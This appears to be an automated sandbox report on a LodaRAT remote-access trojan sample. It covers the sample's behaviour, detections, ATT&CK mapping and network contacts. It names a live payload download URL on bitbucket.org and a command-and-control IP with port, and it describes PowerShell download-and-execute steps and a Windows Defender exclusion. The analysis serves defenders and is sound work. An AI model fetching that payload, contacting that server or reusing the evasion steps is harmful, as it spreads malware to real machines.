              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exeCode function: 10_2_004720DB GetLocalTime,__swprintf,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,10_2_004720DB
              Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exeCode function: 10_2_00472C3F GetUserNameW,10_2_00472C3F
              Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exeCode function: 10_2_0041E364 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,SetOaNoCache,10_2_0041E364
              Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exeCode function: 10_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary,10_2_0040E500
              Source: AHPOBS.exe, 0000000A.00000002.3916841714.0000000000C03000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AntiVirusProductWindows Defender{D68DDC3A-831F-4fae-9E44-DA132C1ACF46}windowsdefender://%ProgramFiles%\Windows Defender\MsMpeng.exe
              Source: AHPOBS.exe, 0000000A.00000002.3916841714.0000000000BDA000.00000004.00000020.00020000.00000000.sdmp, AHPOBS.exe, 0000000A.00000002.3916841714.0000000000C03000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
              Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntiVirusProduct

              Stealing of Sensitive Information

              barindex
              Yara detected LodaRAT
              Source: Yara matchFile source: Process Memory Space: AHPOBS.exe PID: 6756, type: MEMORYSTR
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WIN_XP
              Source: AHPOBS.exe.6.drBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPWIN_2000InstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 8, 1USERPROFILEUSERDOMAINUSERDNSDOMAINDefaultGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYadvapi32.dllRegDeleteKeyExW+.-.+-\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]ISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXISTSEXPANDmsctls_statusbar321tooltips_class32AutoIt v3 GUI%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----&
              Source: AHPOBS.exeBinary or memory string: WIN_XPe
              Source: AHPOBS.exeBinary or memory string: WIN_VISTA
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WIN_XPe)
              Source: AHPOBS.exe, 0000000A.00000002.3917281213.0000000003FAA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WIN_8
              Source: AHPOBS.exeBinary or memory string: WIN_7
              Source: AHPOBS.exeBinary or memory string: WIN_8
              Source: AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WIN_VISTAR
              Source: Yara matchFile source: 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: AHPOBS.exe PID: 6756, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Yara detected LodaRAT
              Source: Yara matchFile source: Process Memory Space: AHPOBS.exe PID: 6756, type: MEMORYSTR
              Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exeCode function: 10_2_0046CEF3 OleInitialize,_wcslen,CreateBindCtx,MkParseDisplayName,CLSIDFromProgID,GetActiveObject,10_2_0046CEF3
              Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exeCode function: 10_2_004652BE socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,10_2_004652BE
              Source: C:\Users\user\AppData\Local\Temp\AHPOBS.exeCode function: 10_2_00476619 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,10_2_00476619

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity Information11
              Scripting              		2
              Valid Accounts              		1
              Windows Management Instrumentation              		11
              Scripting              		1
              Exploitation for Privilege Escalation              		11
              Disable or Modify Tools              		21
              Input Capture              		2
              System Time Discovery              		Remote Services1
              Archive Collected Data              		2
              Ingress Tool Transfer              		Exfiltration Over Other Network Medium1
              System Shutdown/Reboot
              CredentialsDomainsDefault Accounts1
              Native API              		1
              DLL Side-Loading              		1
              DLL Side-Loading              		1
              Deobfuscate/Decode Files or Information              		LSASS Memory1
              Account Discovery              		Remote Desktop Protocol21
              Input Capture              		11
              Encrypted Channel              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts2
              PowerShell              		2
              Valid Accounts              		2
              Valid Accounts              		2
              Obfuscated Files or Information              		Security Account Manager3
              File and Directory Discovery              		SMB/Windows Admin Shares3
              Clipboard Data              		2
              Non-Application Layer Protocol              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook21
              Access Token Manipulation              		1
              DLL Side-Loading              		NTDS15
              System Information Discovery              		Distributed Component Object ModelInput Capture3
              Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script12
              Process Injection              		1
              Masquerading              		LSA Secrets251
              Security Software Discovery              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
              Valid Accounts              		Cached Domain Credentials31
              Virtualization/Sandbox Evasion              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items31
              Virtualization/Sandbox Evasion              		DCSync3
              Process Discovery              		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
              Access Token Manipulation              		Proc Filesystem11
              Application Window Discovery              		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt12
              Process Injection              		/etc/passwd and /etc/shadow1
              System Owner/User Discovery              		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1580296 Sample: Gq48hjKhZf.exe Startdate: 24/12/2024 Architecture: WINDOWS Score: 100 37 s3-w.us-east-1.amazonaws.com 2->37 39 s3-1-w.amazonaws.com 2->39 41 2 other IPs or domains 2->41 53 Suricata IDS alerts for network traffic 2->53 55 Antivirus detection for dropped file 2->55 57 Multi AV Scanner detection for dropped file 2->57 59 8 other signatures 2->59 9 Gq48hjKhZf.exe 8 2->9         started        signatures3 process4 file5 33 C:\Users\user\AppData\Local\Temp\...\AC31.bat, ASCII 9->33 dropped 12 cmd.exe 1 9->12         started        process6 signatures7 61 Suspicious powershell command line found 12->61 63 Tries to download and execute files (via powershell) 12->63 65 Adds a directory exclusion to Windows Defender 12->65 15 cmd.exe 1 12->15         started        17 powershell.exe 23 12->17         started        20 powershell.exe 23 12->20         started        22 2 other processes 12->22 process8 dnsIp9 26 AHPOBS.exe 2 15->26         started        49 Loading BitLocker PowerShell Module 17->49 51 Powershell drops PE file 17->51 43 s3-w.us-east-1.amazonaws.com 3.5.8.193, 443, 49705 AMAZON-AESUS United States 22->43 45 bitbucket.org 185.166.143.49, 443, 49704 AMAZON-02US Germany 22->45 31 C:\Users\user\AppData\Local\Temp\AHPOBS.exe, PE32 22->31 dropped file10 signatures11 process12 dnsIp13 47 172.232.216.250, 4000, 49808, 49859 AKAMAI-ASN1EU United States 26->47 35 C:\Users\user\AppData\Roaming\...\svhost.exe, PE32 26->35 dropped 67 Antivirus detection for dropped file 26->67 69 Multi AV Scanner detection for dropped file 26->69 71 Machine Learning detection for dropped file 26->71 file14 signatures15

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              Gq48hjKhZf.exe57%VirustotalBrowse
              Gq48hjKhZf.exe39%ReversingLabs
              Gq48hjKhZf.exe100%Joe Sandbox ML

              Dropped Files

              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Roaming\Windata\svhost.exe100%AviraHEUR/AGEN.1321335
              C:\Users\user\AppData\Local\Temp\AHPOBS.exe100%AviraHEUR/AGEN.1321335
              C:\Users\user\AppData\Roaming\Windata\svhost.exe100%Joe Sandbox ML
              C:\Users\user\AppData\Local\Temp\AHPOBS.exe100%Joe Sandbox ML
              C:\Users\user\AppData\Local\Temp\AHPOBS.exe74%ReversingLabsWin32.Trojan.AutoitInject
              C:\Users\user\AppData\Local\Temp\AHPOBS.exe71%VirustotalBrowse
              C:\Users\user\AppData\Roaming\Windata\svhost.exe74%ReversingLabsWin32.Trojan.AutoitInject
              C:\Users\user\AppData\Roaming\Windata\svhost.exe71%VirustotalBrowse

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              No Antivirus matches

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              s3-w.us-east-1.amazonaws.com
              		3.5.8.193
              		truefalse
                		high
                bitbucket.org
                		185.166.143.49
                		truefalse
                  		high
                  bbuseruploads.s3.amazonaws.com
                  		unknown
                  		unknownfalse
                    		high

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    https://bitbucket.org/mynewworkspace123312/scnd/downloads/AHPOBS.exefalse
                      		high

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      http://www.autoitscript.com/autoit3/files/beta/autoit/archive/sqlite/SQLite3O:TeAHPOBS.exe, 0000000A.00000002.3917281213.0000000003E85000.00000004.00000020.00020000.00000000.sdmpfalse
                        		high
                        http://ip-score.com/checkip/AHPOBS.exe, 0000000A.00000002.3917083780.0000000003D10000.00000004.00000020.00020000.00000000.sdmpfalse
                          		high
                          http://checkip.amazonaws.com/AHPOBS.exe, 0000000A.00000002.3917281213.0000000003E85000.00000004.00000020.00020000.00000000.sdmpfalse
                            		high

                            World Map of Contacted IPs

                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs

                            Public IPs

                            IPDomainCountryFlagASNASN NameMalicious
                            185.166.143.49
                            		bitbucket.orgGermany
                            		16509AMAZON-02USfalse
                            172.232.216.250
                            		unknownUnited States
                            		20940AKAMAI-ASN1EUtrue
                            3.5.8.193
                            		s3-w.us-east-1.amazonaws.comUnited States
                            		14618AMAZON-AESUSfalse

                            General Information

                            Joe Sandbox version:41.0.0 Charoite
                            Analysis ID:1580296
                            Start date and time:2024-12-24 09:01:17 +01:00
                            Joe Sandbox product:CloudBasic
                            Overall analysis duration:0h 6m 56s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                            Run name:Run with higher sleep bypass
                            Number of analysed new started processes analysed:12
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Sample name:Gq48hjKhZf.exe
                            renamed because original name is a hash value
                            Original Sample Name:454bf064c19d363b154a419fc69dc693.exe
                            Detection:MAL
                            Classification:mal100.troj.evad.winEXE@14/14@2/3
                            EGA Information:
                            • Successful, ratio: 100%
                            HCA Information:
                            • Successful, ratio: 100%
                            • Number of executed functions: 101
                            • Number of non-executed functions: 262
                            Cookbook Comments:
                            • Found application associated with file extension: .exe
                            • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                            • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored

                            Warnings

                            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, WmiPrvSE.exe
                            • Excluded IPs from analysis (whitelisted): 13.107.246.63, 4.245.163.56
                            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                            • Not all processes where analyzed, report is missing behavior information
                            • Report size exceeded maximum capacity and may have missing behavior information.
                            • Report size exceeded maximum capacity and may have missing disassembly code.
                            • Report size getting too big, too many NtCreateKey calls found.
                            • Report size getting too big, too many NtOpenKeyEx calls found.
                            • Report size getting too big, too many NtQueryValueKey calls found.
                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                            Simulations

                            Behavior and APIs

                            No simulations

                            Joe Sandbox View / Context

                            IPs

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            185.166.143.49http://jasonj002.bitbucket.io/Get hashmaliciousHTMLPhisherBrowse
                            • jasonj002.bitbucket.io/
                            172.232.216.2507uJ95NO82G.exeGet hashmaliciousLodaRATBrowse
                              3.5.8.193https://iuzehfkrzhrkz95r.s3.amazonaws.com/url.htmlGet hashmaliciousPhisherBrowse

                                Domains

                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                bitbucket.org2oM46LNCOo.exeGet hashmaliciousLummaCBrowse
                                • 185.166.143.50
                                tTGxYWtjG5.exeGet hashmaliciousLummaCBrowse
                                • 185.166.143.48
                                iaLId0uLUw.exeGet hashmaliciousLummaCBrowse
                                • 185.166.143.50
                                yuij5p5p3W.exeGet hashmaliciousLummaCBrowse
                                • 185.166.143.50
                                NAnOVCOt4L.exeGet hashmaliciousLummaCBrowse
                                • 185.166.143.50
                                fkawMJ7FH8.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RedLine, StealcBrowse
                                • 185.166.143.48
                                OtHVIQ2ge4.exeGet hashmaliciousLummaCBrowse
                                • 185.166.143.49
                                fr2Mul3G6m.exeGet hashmaliciousLummaCBrowse
                                • 185.166.143.49
                                payment_3493.pdfGet hashmaliciousUnknownBrowse
                                • 185.166.143.48
                                s3-w.us-east-1.amazonaws.com2oM46LNCOo.exeGet hashmaliciousLummaCBrowse
                                • 52.217.14.36
                                tTGxYWtjG5.exeGet hashmaliciousLummaCBrowse
                                • 16.15.177.52
                                iaLId0uLUw.exeGet hashmaliciousLummaCBrowse
                                • 3.5.17.0
                                yuij5p5p3W.exeGet hashmaliciousLummaCBrowse
                                • 54.231.128.9
                                http://plnbl.io/review/FSUQBEfTfzwHGet hashmaliciousUnknownBrowse
                                • 54.231.128.17
                                NAnOVCOt4L.exeGet hashmaliciousLummaCBrowse
                                • 3.5.27.149
                                fkawMJ7FH8.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RedLine, StealcBrowse
                                • 3.5.29.203
                                OtHVIQ2ge4.exeGet hashmaliciousLummaCBrowse
                                • 52.217.75.84
                                fr2Mul3G6m.exeGet hashmaliciousLummaCBrowse
                                • 3.5.25.145
                                payment_3493.pdfGet hashmaliciousUnknownBrowse
                                • 3.5.29.153

                                ASNs

                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                AKAMAI-ASN1EUL5Kgf2Tvkc.exeGet hashmaliciousLummaCBrowse
                                • 23.55.153.106
                                7uJ95NO82G.exeGet hashmaliciousLodaRATBrowse
                                • 172.232.216.250
                                nabx86.elfGet hashmaliciousUnknownBrowse
                                • 23.7.216.65
                                Violated Heroine_91zbZ-1.exeGet hashmaliciousUnknownBrowse
                                • 184.85.182.130
                                [External] 120112 Manual Policies Overview Guide_ 8VM8-WZPT3L-LYH1.emlGet hashmaliciousUnknownBrowse
                                • 23.195.39.65
                                ChoForgot.exeGet hashmaliciousVidarBrowse
                                • 23.219.82.25
                                nTyPEbq9wQ.lnkGet hashmaliciousUnknownBrowse
                                • 104.126.116.105
                                jSFUzuYPG9.exeGet hashmaliciousLummaCBrowse
                                • 23.55.153.106
                                HK8IIasL9i.exeGet hashmaliciousLummaCBrowse
                                • 23.55.153.106
                                OGBLsboKIF.exeGet hashmaliciousLummaCBrowse
                                • 23.55.153.106
                                AMAZON-02US2oM46LNCOo.exeGet hashmaliciousLummaCBrowse
                                • 185.166.143.50
                                tTGxYWtjG5.exeGet hashmaliciousLummaCBrowse
                                • 185.166.143.48
                                iaLId0uLUw.exeGet hashmaliciousLummaCBrowse
                                • 185.166.143.50
                                yuij5p5p3W.exeGet hashmaliciousLummaCBrowse
                                • 185.166.143.50
                                sh4.nn.elfGet hashmaliciousOkiruBrowse
                                • 54.171.230.55
                                mipsel.nn.elfGet hashmaliciousOkiruBrowse
                                • 54.171.230.55
                                armv5l.elfGet hashmaliciousUnknownBrowse
                                • 35.163.11.216
                                splm68k.elfGet hashmaliciousUnknownBrowse
                                • 3.138.165.134
                                nklarm7.elfGet hashmaliciousUnknownBrowse
                                • 3.115.112.216
                                AMAZON-AESUSx6Rd1DzUJA.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                • 34.226.108.155
                                SzXZZDlkVE.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                • 34.226.108.155
                                ijn8pyFXSP.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                • 34.226.108.155
                                WzyLDvldFI.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                • 34.226.108.155
                                PhwUGyok2i.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                • 34.226.108.155
                                nRYpZg6i5E.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                • 34.226.108.155
                                RGU8qibimk.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                • 34.226.108.155
                                FMuiLqyqaT.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                • 34.226.108.155
                                iaLId0uLUw.exeGet hashmaliciousLummaCBrowse
                                • 3.5.17.0
                                armv6l.elfGet hashmaliciousUnknownBrowse
                                • 18.207.104.163

                                JA3 Fingerprints

                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                3b5074b1b5d032e5620f69f9f700ff0esingl6.mp4.htaGet hashmaliciousLummaCBrowse
                                • 3.5.8.193
                                • 185.166.143.49
                                hnskdfgjgar22.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                • 3.5.8.193
                                • 185.166.143.49
                                Proforma Invoice.exeGet hashmaliciousMassLogger RATBrowse
                                • 3.5.8.193
                                • 185.166.143.49
                                Azygoses125.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                • 3.5.8.193
                                • 185.166.143.49
                                WO.exeGet hashmaliciousMetasploitBrowse
                                • 3.5.8.193
                                • 185.166.143.49
                                ChoForgot.exeGet hashmaliciousVidarBrowse
                                • 3.5.8.193
                                • 185.166.143.49
                                payment_3493.pdfGet hashmaliciousUnknownBrowse
                                • 3.5.8.193
                                • 185.166.143.49
                                1lhZVZx5nD.exeGet hashmaliciousStealc, VidarBrowse
                                • 3.5.8.193
                                • 185.166.143.49
